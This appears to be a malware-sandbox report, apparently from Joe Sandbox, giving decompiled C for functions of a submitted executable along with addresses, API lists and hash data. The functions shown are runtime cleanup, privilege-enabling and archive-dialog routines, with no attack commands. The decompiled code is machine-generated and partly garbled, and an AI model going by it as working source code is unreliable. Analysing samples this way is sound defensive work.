						_push(_t80);
						_v8 = E0102B693(_t56);
						_t40 = E010284DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0102B693(_t56);
						E010284DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x103e668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x01027dd9
0x01027de3
0x01027de7
0x01027de9
0x01027ded
0x01027df7
0x01027e08
0x01027e0d
0x01027e0f
0x01027e11
0x01027e13
0x01027e15
0x01027e19
0x01027ed3
0x01027ee1
0x01027ee3
0x01027ee8
0x01027eef
0x01027ef1
0x01027eff
0x01027f0e
0x01027f11
0x01027f13
0x00000000
0x01027f14
0x01027e21
0x01027e26
0x01027e2b
0x01027e2d
0x01027e2d
0x01027e2f
0x01027e34
0x01027e38
0x01027e38
0x01027e3b
0x01027e5a
0x01027e5a
0x01027e5c
0x01027e5f
0x01027e68
0x01027e6b
0x01027e70
0x01027e73
0x01027e78
0x00000000
0x00000000
0x01027e7a
0x00000000
0x01027e3d
0x01027e3d
0x01027e3f
0x01027e48
0x01027e4b
0x01027e50
0x01027e53
0x01027e58
0x01027e82
0x01027e85
0x01027e87
0x01027e8a
0x01027e92
0x01027e98
0x01027e9f
0x01027ea1
0x01027ea9
0x01027eb8
0x01027ebc
0x01027ebe
0x01027ec1
0x00000000
0x00000000
0x01027ec3
0x01027ec6
0x01027ec8
0x01027ec8
0x01027ec9
0x01027ecb
0x01027ece
0x00000000
0x01027ec8
0x00000000
0x01027e58
0x01027e3b
0x00000000

APIs

_free.LIBCMT ref: 01027E4B
_free.LIBCMT ref: 01027E6B

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b3869ac9d505b31ecc510b53db11485fd20b8ff8a7c6ddb70855780d58fef892
Instruction ID: f330a05758cc6526aaefa082c2346569769efbcc59bb7bbacba1c35b3bee456b
Opcode Fuzzy Hash: b3869ac9d505b31ecc510b53db11485fd20b8ff8a7c6ddb70855780d58fef892
Instruction Fuzzy Hash: BB41D132A003249FDB21DF78C880A9EB7F5EF99714F5585A9D995EB241EB31AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01029029, Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E01029029(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x103e6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E010285A9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E0102A671(_t13, _t17, __eflags,  *0x103e6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E01028E16(_t13, _t16, 0x1061290);
							E010284DE(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E010284DE();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E0102A61B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x01029029
0x01029034
0x01029036
0x01029038
0x0102903d
0x01029040
0x0102904e
0x0102905a
0x0102905d
0x01029060
0x01029072
0x01029077
0x01029079
0x01029084
0x0102908a
0x01029092
0x01029094
0x00000000
0x00000000
0x00000000
0x00000000
0x0102907b
0x0102907b
0x00000000
0x0102907b
0x01029062
0x01029062
0x01029063
0x01029063
0x01029096
0x01029097
0x01029097
0x01029042
0x01029048
0x0102904c
0x0102909f
0x010290a0
0x010290a6
0x00000000
0x00000000
0x00000000
0x0102904c
0x010290ad

APIs

GetLastError.KERNEL32(?,01040EE8,00000200,0102895F,010258FE,?,?,?,?,0100D25E,?,03403C80,00000063,00000004,0100CFE0,?), ref: 0102902E
_free.LIBCMT ref: 01029063
_free.LIBCMT ref: 0102908A
SetLastError.KERNEL32(00000000,01033958,00000050,01040EE8), ref: 01029097
SetLastError.KERNEL32(00000000,01033958,00000050,01040EE8), ref: 010290A0

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: dcb6707a6d4d99731110aa07a4b9a3556e36a0989adea8a29b1c301b1b6c27f5
Instruction ID: a4d3883733fa0f7278398b9593cac8be855e80ecf49980cecf1b560cd1f8a133
Opcode Fuzzy Hash: dcb6707a6d4d99731110aa07a4b9a3556e36a0989adea8a29b1c301b1b6c27f5
Instruction Fuzzy Hash: 4A012D766057356F9332267D6CC4A6B259DABC06B9B200129F5D9E7146DF7D88014250

Uniqueness

Uniqueness Score: -1.00%

Function 0101075B, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0101075B(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E01031FA1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E01010A41(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E0101084E(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x0101075b
0x01010764
0x01010766
0x0101076b
0x0101076c
0x01010776
0x01010778
0x0101077d
0x0101077f
0x0101078f
0x0101079b
0x0101079d
0x010107a0
0x010107a2
0x010107a9
0x010107af
0x010107b0
0x010107b3
0x010107a0
0x010107c2
0x010107ce
0x010107da
0x010107e5
0x010107f0

APIs

Part of subcall function 01010A41: ResetEvent.KERNEL32(?), ref: 01010A53
Part of subcall function 01010A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 01010A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0101078F
CloseHandle.KERNEL32(?,?), ref: 010107A9
DeleteCriticalSection.KERNEL32(?), ref: 010107C2
CloseHandle.KERNEL32(?), ref: 010107CE
CloseHandle.KERNEL32(?), ref: 010107DA

Part of subcall function 0101084E: WaitForSingleObject.KERNEL32(?,000000FF,01010A78,?), ref: 01010854
Part of subcall function 0101084E: GetLastError.KERNEL32(?), ref: 01010860

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: c2117f8bbaeec4e86d2399c545f3fd27737cab0ae62a80276d2461517abfc41f
Instruction ID: 9444e21a3745797c921857e63d8c24ba8f0ee5b6cc5d3416c01a4826b514f9ad
Opcode Fuzzy Hash: c2117f8bbaeec4e86d2399c545f3fd27737cab0ae62a80276d2461517abfc41f
Instruction Fuzzy Hash: 49018072544704EBC7329B69D9C4BC6FBEDFB48711F000519F1DA86158CB7A69848B90

Uniqueness

Uniqueness Score: -1.00%

Function 0102BF10, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0102BF10(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x103ed50; // 0x103ed44
					if(_t23 != 0) {
						E010284DE(_t7);
					}
					_t2 = _t21 + 4; // 0x732524
					_t24 =  *_t2 -  *0x103ed54; // 0x1061704
					if(_t24 != 0) {
						E010284DE(_t8);
					}
					_t3 = _t21 + 8; // 0x732540
					_t25 =  *_t3 -  *0x103ed58; // 0x1061704
					if(_t25 != 0) {
						E010284DE(_t9);
					}
					_t4 = _t21 + 0x30; // 0x4f0049
					_t26 =  *_t4 -  *0x103ed80; // 0x103ed48
					if(_t26 != 0) {
						E010284DE(_t10);
					}
					_t5 = _t21 + 0x34; // 0x4e
					_t6 =  *_t5;
					_t27 = _t6 -  *0x103ed84; // 0x1061708
					if(_t27 != 0) {
						return E010284DE(_t6);
					}
				}
				return _t6;
			}

0x0102bf16
0x0102bf1b
0x0102bf1f
0x0102bf25
0x0102bf28
0x0102bf2d
0x0102bf2e
0x0102bf31
0x0102bf37
0x0102bf3a
0x0102bf3f
0x0102bf40
0x0102bf43
0x0102bf49
0x0102bf4c
0x0102bf51
0x0102bf52
0x0102bf55
0x0102bf5b
0x0102bf5e
0x0102bf63
0x0102bf64
0x0102bf64
0x0102bf67
0x0102bf6d
0x00000000
0x0102bf75
0x0102bf6d
0x0102bf78

APIs

_free.LIBCMT ref: 0102BF28

Part of subcall function 010284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958), ref: 010284F4
Part of subcall function 010284DE: GetLastError.KERNEL32(01033958,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958,01033958), ref: 01028506

_free.LIBCMT ref: 0102BF3A
_free.LIBCMT ref: 0102BF4C
_free.LIBCMT ref: 0102BF5E
_free.LIBCMT ref: 0102BF70

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dd4861baf5a1f0800094a8e534495aa03b8a9154aae02b9f6e231ff44e1eba05
Instruction ID: 4d1c8e8c631d139911ac8eea19bcc2ceac047f0f227421cf80a8562e0fc18eb4
Opcode Fuzzy Hash: dd4861baf5a1f0800094a8e534495aa03b8a9154aae02b9f6e231ff44e1eba05
Instruction Fuzzy Hash: 01F01236504225A796B0EA6CF689C57B7EDBA10710764898AF5C8D7D44CF36F8808B54

Uniqueness

Uniqueness Score: -1.00%

Function 01028060, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E01028060(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x103ed40; // 0x33f2d08
					if(_t7 != 0x103eb20) {
						E010284DE(_t7);
						 *0x103ed40 = 0x103eb20;
					}
				}
				E010284DE( *0x1061288);
				 *0x1061288 = 0;
				E010284DE( *0x106128c);
				 *0x106128c = 0;
				E010284DE( *0x10616d8);
				 *0x10616d8 = 0;
				E010284DE( *0x10616dc);
				 *0x10616dc = 0;
				return 1;
			}

0x01028069
0x0102806d
0x0102806f
0x0102807b
0x0102807e
0x01028084
0x01028084
0x0102807b
0x01028090
0x0102809d
0x010280a3
0x010280ae
0x010280b4
0x010280bf
0x010280c5
0x010280cd
0x010280d6

APIs

_free.LIBCMT ref: 0102807E

Part of subcall function 010284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958), ref: 010284F4
Part of subcall function 010284DE: GetLastError.KERNEL32(01033958,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958,01033958), ref: 01028506

_free.LIBCMT ref: 01028090
_free.LIBCMT ref: 010280A3
_free.LIBCMT ref: 010280B4
_free.LIBCMT ref: 010280C5

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3308110953f615641fe8bf342f6aca4ccb9c8b07e8a1772f16285b6421d9d12d
Instruction ID: af0430031ed2efc48a03ab0452414dbfe58467749b1ba863c9a6abe960d9f7f0
Opcode Fuzzy Hash: 3308110953f615641fe8bf342f6aca4ccb9c8b07e8a1772f16285b6421d9d12d
Instruction Fuzzy Hash: C9F0D0BC9015359BC7B16F1AF8444453BA5BB58620309874BF4D197A78CF3F08619FC1

Uniqueness

Uniqueness Score: -1.00%

Function 010276BD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E010276BD(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0102B290(_t52);
					GetModuleFileNameA(0, 0x1061130, 0x104);
					_t49 =  *0x10616e0; // 0x33e33e0
					 *0x10616e8 = 0x1061130;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x1061130;
					}
					_v8 = 0;
					_v16 = 0;
					E010277E1(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E01027956(_v8, _v16, 1);
					if(_t64 != 0) {
						E010277E1(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0102ADA3(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x10616d4 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x10616d8 = _t59;
									L16:
									E010284DE(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x10616d4 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x10616d8 = _t43;
						goto L10;
					} else {
						_t44 = E0102895A();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E010284DE(_t64);
						return _t50;
					}
				} else {
					_t45 = E0102895A();
					_t65 = 0x16;
					 *_t45 = _t65;
					E01028839();
					return _t65;
				}
			}

0x010276bd
0x010276ca
0x010276ea
0x010276fd
0x01027703
0x01027709
0x01027711
0x01027718
0x01027718
0x0102771d
0x01027724
0x0102772b
0x0102773d
0x01027744
0x01027763
0x0102776f
0x0102778a
0x0102778d
0x01027794
0x0102779a
0x010277a1
0x010277a4
0x010277a6
0x010277aa
0x010277b4
0x010277b4
0x010277b6
0x010277bc
0x010277bf
0x010277c1
0x010277c7
0x010277c8
0x010277ce
0x00000000
0x00000000
0x00000000
0x00000000
0x010277ac
0x010277ac
0x010277ac
0x010277af
0x010277b0
0x00000000
0x010277ac
0x0102779c
0x00000000
0x0102779c
0x01027775
0x0102777a
0x0102777c
0x0102777e
0x00000000
0x01027746
0x01027746
0x0102774b
0x0102774d
0x0102774e
0x01027783
0x01027783
0x010277d1
0x010277d2
0x00000000
0x010277db
0x010276d2
0x010276d2
0x010276d9
0x010276da
0x010276dc
0x00000000
0x010276e1

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe,00000104), ref: 010276FD
_free.LIBCMT ref: 010277C8
_free.LIBCMT ref: 010277D2

Strings

C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, xrefs: 010276F4, 010276FB, 0102772A, 01027762

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
API String ID: 2506810119-1812302603
Opcode ID: 59a6261a850bd19f793dee9c0d6280c7e26dc043dcfac926250d6ab25475c48b
Instruction ID: 4b1a586d47e28b52b7f861e3d99d08f5d3a7385c40637c8d337a9307faa7b471
Opcode Fuzzy Hash: 59a6261a850bd19f793dee9c0d6280c7e26dc043dcfac926250d6ab25475c48b
Instruction Fuzzy Hash: 34317075A00229EFDB22DF99D884DDEBBFCFFA9710F1440A6E98497210D6714A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01007574, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01007574(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0101E28C(E01031F37, _t61);
				E0101E360();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E01003B3D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x1040eb2 == 0) {
						if(E01007BF5(L"SeSecurityPrivilege") != 0) {
							 *0x1040eb1 = 1;
						}
						E01007BF5(L"SeRestorePrivilege");
						 *0x1040eb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x1040eb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x1062000() == 0) {
						if(E0100B66C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E01001F94(_t70, 0x52, _t54 + 0x24,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E0101F190(_t32);
							if(_t32 == 5 && E01010020() == 0) {
								E0100156B(_t61 - 0x6c, 0x18);
								E01010E37(_t61 - 0x6c);
							}
							E01006FC6(0x1040f50, 1);
						} else {
							_t39 =  *0x1062000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E010015A0(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x01007574
0x01007574
0x01007574
0x01007579
0x01007583
0x0100758b
0x0100758e
0x01007591
0x01007594
0x01007597
0x0100759a
0x0100759f
0x010075a0
0x010075a1
0x010075a7
0x010075af
0x010075bc
0x010075ca
0x010075cc
0x010075cc
0x010075d8
0x010075dd
0x010075dd
0x010075eb
0x010075ee
0x010075ef
0x010075f3
0x010075f3
0x010075f4
0x010075f5
0x010075f8
0x010075f9
0x010075fa
0x01007605
0x0100761d
0x01007632
0x0100763b
0x01007640
0x0100764f
0x01007657
0x01007667
0x0100766f
0x0100766f
0x01007678
0x0100761f
0x01007628
0x0100762e
0x01007630
0x00000000
0x00000000
0x01007630
0x0100761d
0x0100767e
0x01007682
0x0100768b
0x01007695

APIs

__EH_prolog.LIBCMT ref: 01007579

Part of subcall function 01003B3D: __EH_prolog.LIBCMT ref: 01003B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 01007640

Part of subcall function 01007BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007C04
Part of subcall function 01007BF5: GetLastError.KERNEL32 ref: 01007C4A
Part of subcall function 01007BF5: CloseHandle.KERNEL32(?), ref: 01007C59

Strings

SeRestorePrivilege, xrefs: 010075D3
SeSecurityPrivilege, xrefs: 010075BE

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 8f086495132c15ca32db866c60583ca4bbd68dccd78e6a5f3342c787e9b59e56
Instruction ID: e3b347513b74ca061d2b05130120dfcbb8be5d6c82ed6611008d46f0f2fc7492
Opcode Fuzzy Hash: 8f086495132c15ca32db866c60583ca4bbd68dccd78e6a5f3342c787e9b59e56
Instruction Fuzzy Hash: 8E31E470904249AEFF32EB68DC40BEE7BB9BF18304F004099F5C5AB185CBB95544C761

Uniqueness

Uniqueness Score: -1.00%

Function 0101A430, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0101A430(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E0100130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x1060cb0 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x1060cb0), ( *0x1060cb0)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E0100BC85(__eflags,  *( *0x1060cb0));
					_t22 = E010010F0(_t30, E0100DDD1(_t25, 0x8e),  *( *0x1060cb0), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x1060cb0));
					goto L13;
				}
				goto L6;
			}

0x0101a431
0x0101a436
0x0101a43b
0x0101a440
0x0101a458
0x0101a4e8
0x0101a4ea
0x00000000
0x0101a4ea
0x0101a45e
